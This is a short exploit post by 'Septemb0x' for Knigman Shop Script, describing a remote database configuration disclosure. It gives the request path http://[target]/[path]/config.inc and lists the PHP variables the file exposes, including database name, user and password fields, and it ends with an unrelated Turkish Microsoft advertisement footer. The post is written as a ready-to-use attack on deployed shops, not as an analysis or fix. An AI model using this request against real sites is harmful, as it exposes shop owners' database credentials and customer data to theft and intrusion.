Knigman Shop Script suffers from a remote database configuration disclosure vulnerability.
4568a9052afe1540e313f47e7f21ecab68f900e6d1b37874df6dd2a2e1fa7ee7
< ------------------- header data start ------------------- >
#############################################################
# Application Name : Knigman Shop Script
# Vulnerable Type : Arbitrary Database Config Disclosure Vulnerability
# Infection : SQL Info Get...
# Author : Septemb0x
# Script Down.& WebSite : http://knigman.net/buy.php?tovid=22764 & http://s2.dosya.tc/knigman.zip.html
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
http://[target]/[path]/config.inc
GET TO;
<?
$ashopname = "";
$ashopphone = "";
$ashopemail = "";
$ashopaddress = "";
$ashopurl = "";
$databasename = "";
$databaseuser = "";
$databasepasswd = "";
$orderrecipient = "";
$ordersubject = "";
$timezoneoffset = ;
$affiliateinfo = "";
$affiliaterecipient = "";
?>
< -- bug code end of -- >
_________________________________________________________________
Anýlarýnýzý istediðiniz herkesle çevrimiçi paylaþýn.
http://www.microsoft.com/turkiye/windows/windowslive/products/photos-share.aspx?tab=1